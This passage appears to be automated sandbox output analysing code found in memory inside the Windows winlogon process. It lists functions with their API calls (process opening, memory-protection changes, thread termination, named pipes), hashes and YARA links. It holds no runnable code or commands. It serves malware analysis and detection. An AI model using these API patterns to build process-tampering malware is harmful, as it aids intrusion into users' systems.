Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 2831A233B41B5982F716DF26D544AA973A0BF48F8AF8840208F4807755EF36C5A18383

Function 000001CA7D29C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001CA7D29C94F
SetLastError.KERNEL32 ref: 000001CA7D29C96E
FlsSetValue.KERNEL32 ref: 000001CA7D29C997
FlsSetValue.KERNEL32 ref: 000001CA7D29C9A8
FlsSetValue.KERNEL32 ref: 000001CA7D29C9B9

Part of subcall function 000001CA7D29D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2B6
Part of subcall function 000001CA7D29D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2C0

SetLastError.KERNEL32 ref: 000001CA7D29C9DC

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 19b92fad8f820dd81a55a9e9a50199315003bb2ffc475f1c6e47e87a83ff1d46
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 2011B233E8434842F64667316505FFE3141BF85799FD84624A86A367DADE2AC40357C3

Function 000001CA7D21C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001CA7D21C94F
SetLastError.KERNEL32 ref: 000001CA7D21C96E
FlsSetValue.KERNEL32 ref: 000001CA7D21C997
FlsSetValue.KERNEL32 ref: 000001CA7D21C9A8
FlsSetValue.KERNEL32 ref: 000001CA7D21C9B9

Part of subcall function 000001CA7D21D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2B6
Part of subcall function 000001CA7D21D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2C0

SetLastError.KERNEL32 ref: 000001CA7D21C9DC

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: be797efc4d241fe522fb318c8b0c2a52a319cfeeeb0bbc57bc3f76715505c0c3
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 25118237E8435882F616A7316911BFE7241BF847A8FD4C628A926567DACE3BD40353C3

Function 000001CA7D1EC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001CA7D1EC94F
SetLastError.KERNEL32 ref: 000001CA7D1EC96E
FlsSetValue.KERNEL32 ref: 000001CA7D1EC997
FlsSetValue.KERNEL32 ref: 000001CA7D1EC9A8
FlsSetValue.KERNEL32 ref: 000001CA7D1EC9B9

Part of subcall function 000001CA7D1ED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2B6
Part of subcall function 000001CA7D1ED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2C0

SetLastError.KERNEL32 ref: 000001CA7D1EC9DC

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: a72ea2f354f7ddfc3d159c3a9229b8853cee2434eedb132b01efaf94eb9f651b
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 45115433F8134942FA166731A811BEE3153BF8479DFD84624A866563CADE3AD50183C3

Function 000001CA7D291A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001CA7D291A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D291A74
PathFindFileNameW.SHLWAPI ref: 000001CA7D291A83
lstrlenW.KERNEL32 ref: 000001CA7D291A8F
StrCpyW.SHLWAPI ref: 000001CA7D291AA2
CloseHandle.KERNEL32 ref: 000001CA7D291AB0

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 981376d91bc599ae55fe3b6c15a14bb63b400c610608c7f00c9fc4e34d6b33a7
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: F9018B32B40B4486FA11CB12A848B9BB3A1FBC8FC8F8840349E4D47754DE39C986C3C2

Function 000001CA7D211A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001CA7D211A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D211A74
PathFindFileNameW.SHLWAPI ref: 000001CA7D211A83
lstrlenW.KERNEL32 ref: 000001CA7D211A8F
StrCpyW.SHLWAPI ref: 000001CA7D211AA2
CloseHandle.KERNEL32 ref: 000001CA7D211AB0

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 8b86b7224197d8699fc3a6726de84bfb578e7bf873a1a615f1c4c61348878a40
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 7D016132B44B4482F711DB12A854B9973A1FB88FD4F898034AE4D43754DE3EC54AC7D6

Function 000001CA7D1E1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001CA7D1E1A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D1E1A74
PathFindFileNameW.SHLWAPI ref: 000001CA7D1E1A83
lstrlenW.KERNEL32 ref: 000001CA7D1E1A8F
StrCpyW.SHLWAPI ref: 000001CA7D1E1AA2
CloseHandle.KERNEL32 ref: 000001CA7D1E1AB0

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: a292ab2cfa75126c4a735770990b9ca6806856f301d60702c71bca0c6d7b623e
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: B9016D32B45B8482FB11DB12E868B9973A1FB88FC8F8940349E5E43754DE3DC685C792

Function 000001CA7D293E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D293AAC), ref: 000001CA7D293E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D293AAC), ref: 000001CA7D293E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D293AAC), ref: 000001CA7D293E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D293AAC), ref: 000001CA7D293E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D293AAC), ref: 000001CA7D293E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001CA7D293AAC), ref: 000001CA7D293EAE

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: ae5bcde55931890828b24d78268571c20791c05152b53787220c891cd16456b3
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 20011E76B5174882FB269B21E448B9772A1FF98B49F940024CD5D1A358EF3EC04A87D3

Function 000001CA7D213E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213EAE

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 778107bd0b08783d02a6487691dad5ad8f670edfcd41cc8f228037a5f129dca4
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 13016136B4174882FB269B25E848B9533A4BF48B59F844428D94D06358EF3FC14AC7DB

Function 000001CA7D1E3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3EAE

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: c63064200cc5015cd9426516bf03d8a10638c949921e829e67ac36650152cb9d
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 8C012176B5274882FB269B61E458F9573B0FF44B4AF840024D94D46358EF3EC549C793

Function 000001CA7D291AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001CA7D291AF4
StrCmpNIW.SHLWAPI ref: 000001CA7D291B0E
lstrlenW.KERNEL32 ref: 000001CA7D291B1D
StrCpyW.SHLWAPI ref: 000001CA7D291B32

Strings

\\?\, xrefs: 000001CA7D291B02

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: d1ff288a7fe1735c0b389d8a0fb70851f6f610ee87196fd53a68ee1478238ee0
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: BAF0A47374478892FB219B21F494B9B7361FBC4B9CFC44021CE4946954DE6DC64AC7D2

Function 000001CA7D211AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001CA7D211AF4
StrCmpNIW.SHLWAPI ref: 000001CA7D211B0E
lstrlenW.KERNEL32 ref: 000001CA7D211B1D
StrCpyW.SHLWAPI ref: 000001CA7D211B32

Strings

\\?\, xrefs: 000001CA7D211B02

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: a75b9edf9b8994863e05616ee0606fecf03f18b00d3583885107efc661ca5ccb
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 0DF0A43375478892F7218B20F484B9A7360FB84B9CFC4C025DA4946554DE7EC74AC7D6

Function 000001CA7D1E1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001CA7D1E1AF4
StrCmpNIW.SHLWAPI ref: 000001CA7D1E1B0E
lstrlenW.KERNEL32 ref: 000001CA7D1E1B1D
StrCpyW.SHLWAPI ref: 000001CA7D1E1B32

Strings

\\?\, xrefs: 000001CA7D1E1B02

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 5131f7decd79886618750e5d372dbf6a6da6afe116d4c20a90690d0bf9f1d3e7
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 69F0AF73B5878892FB218B24F8D4B997371FB44B8CFC44021CA4942958DE6EC788CB52

Function 000001CA7D29B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001CA7D29B929
GetProcAddress.KERNEL32 ref: 000001CA7D29B93F
FreeLibrary.KERNEL32 ref: 000001CA7D29B95B

Strings

mscoree.dll, xrefs: 000001CA7D29B920
CorExitProcess, xrefs: 000001CA7D29B938

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: c70e5ec6ea267bb5cb580a1a018e7bc41a37316a57f8b87e098493fbd84ad30a
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: E6F0683265470941FA114B24D884B9B7720FF89759FD402199E69491E4CF2EC44AC6C3

Function 000001CA7D293708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001CA7D29275A), ref: 000001CA7D29372A
StrCpyW.SHLWAPI ref: 000001CA7D29373A
StrCatW.SHLWAPI ref: 000001CA7D293746
PathCombineW.SHLWAPI(?,?,00000000,000001CA7D29275A), ref: 000001CA7D293754

Strings

\\.\pipe\, xrefs: 000001CA7D293720

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: a6a4aab0aeac4f6197f237278a9c0a3b7006fc945381a0c775642f0a2f533f1f
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 4FF05E76B44B8881FA058B13B91459BB260FFC8FC9F848430EE0A0BB18DE69C44687C3

Function 000001CA7D21B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001CA7D21B929
GetProcAddress.KERNEL32 ref: 000001CA7D21B93F
FreeLibrary.KERNEL32 ref: 000001CA7D21B95B

Strings

mscoree.dll, xrefs: 000001CA7D21B920
CorExitProcess, xrefs: 000001CA7D21B938

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 70c250347f594e71b17261cfaf8131f5a1330f05be77572a744952222a5b5b64
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 6FF06273A4470941FA118B24E845BA93730FF49769FD54219AA6A451E4CF2EC44AC6CB

Function 000001CA7D213708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001CA7D21275A), ref: 000001CA7D21372A
StrCpyW.SHLWAPI ref: 000001CA7D21373A
StrCatW.SHLWAPI ref: 000001CA7D213746
PathCombineW.SHLWAPI(?,?,00000000,000001CA7D21275A), ref: 000001CA7D213754

Strings

\\.\pipe\, xrefs: 000001CA7D213720

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
